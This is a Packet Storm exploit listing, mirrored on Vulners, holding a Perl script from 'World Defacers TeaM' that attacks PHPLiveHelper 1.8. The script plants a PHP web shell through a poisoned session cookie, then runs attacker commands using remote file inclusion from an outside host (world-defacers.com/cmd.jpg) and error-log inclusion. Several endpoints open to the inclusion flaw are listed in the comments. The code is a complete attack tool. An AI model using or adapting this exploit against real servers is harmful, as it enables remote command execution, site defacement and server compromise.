Lucene search

K

WD-TMPLH.txt

🗓️ 01 Apr 2006 00:00:00Reported by rUnViRuSType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

PHPLiveHelper 1.8 remote command execution exploit by World Defacers Tea

Show more
Code
`#!/usr/bin/perl -w  
# PHPLiveHelper 1.8 remote command execution Xploit  
#  
# Discovered & Coded By rUnViRuS  
# World Defacers TeaM  
# WD-members: rUnViRuS - Papipsycho - r3v3ng4ns  
# Details  
# =======  
# Note : PHPLiveHelper 1.8 is vulnerable too, but its just that you   
# cannot include file remotly.  
#  
# phplivehelper/initiate.php?abs_path=Http://evilshell  
# waiting.php?abs_path=Http://evilshell  
# welcome.php?abs_path=Http://evilshell  
# admin/index.php?abs_path=Http://evilshell  
# javascript.php?abs_path=Http://evilshell  
# checkchat.php?abs_path=Http://evilshell  
# blank.php?abs_path=Http://evilshell  
#  
# if (isset($abs_path) && $abs_path != "") {  
# include_once $abs_path."global.php";  
# } else {  
# include_once "./global.php";  
# .  
# .  
# .  
#  
# Join with us to Get Prvi8 Exploit  
# Priv8 Priv8 Priv8 Priv8  
# -------- ~~~~*~~~~ --------  
use IO::Socket;  
  
print "\n=============================================================================\r\n";  
print " * TheMindPHPLiveHelper 1.8 Remote Command Execution by www.worlddefacers.de *\r\n";   
print "=============================================================================\r\n";  
print "\n\n[*] WD-members: rUnViRuS - Papipsycho - r3v3ng4ns \n";  
print "[*] Bug On :TheMindPHPLiveHelper 1.8 Software \n";  
print "[*] Discovered & Coded By : rUnViRuS\n";  
print "[*] Join with us to Get Prvi8 Exploit \n";  
print "[*] www.worlddefacers.de\n\n\n";  
print "============================================================================\r\n";  
print " -=Coded by Zod, Bug Found by rUnViRuS=-\r\n";  
print " www.worlddefacers.de - www.world-defacers.de\r\n";  
print "============================================================================\r\n";  
sub main::urlEncode {  
my ($string) = @_;  
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;  
#$string# =~ tr/.//;  
return $string;  
}  
  
$serv=$ARGV[0];  
$path=$ARGV[1];  
$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};  
  
if (@ARGV < 3)  
{  
print "Usage:\r\n";  
print "\n\n[*] usage: WD-TMPLH.pl <host> <Path> <cmd>\n";  
print "[*] usage: WD-TMPLH.pl www.HosT.com /phplivehelper/ cmd (ls -ali\n";  
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";  
exit();  
}  
  
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")  
or die "[+] Connecting ... Could not connect to host.\n\n";  
  
$shell='<?php ob_clean();echo"Hi Master!\r\n";ini_set("max_execution_time",0);passthru($_GET[CMD]);die;?>';  
$shell=urlEncode($shell);  
$data="loginname=sun&passwd=sun";  
print $sock "POST ".$path."users.php HTTP/1.1\r\n";  
print $sock "Host: ".$serv."\r\n";  
print $sock "Content-Length: ".length($data)."\r\n";  
print $sock "Cookie: gl_session=%27".$shell."\r\n";  
print $sock "Connection: Close\r\n\r\n";  
print $sock $data;  
close($sock);  
  
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")  
or die "[+] Connecting ... Could not connect to host.\n\n";  
  
$xpl="../logs/error.log";  
$xpl=urlEncode($xpl)."%00";  
print $sock "GET ".$path."initiate.php?abs_path=http://www.world-defacers.com/cmd.jpg?&cmd=".$cmd." HTTP/1.1\r\n";  
print $sock "Host: ".$serv."\r\n";  
print $sock "Cookie: language=".$xpl.";\r\n";  
print $sock "Connection: Close\r\n\r\n";  
  
while ($answer = <$sock>) {  
print $answer;  
}  
close($sock);  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Apr 2006 00:00Current
7.4High risk
Vulners AI Score7.4
30
.json
Report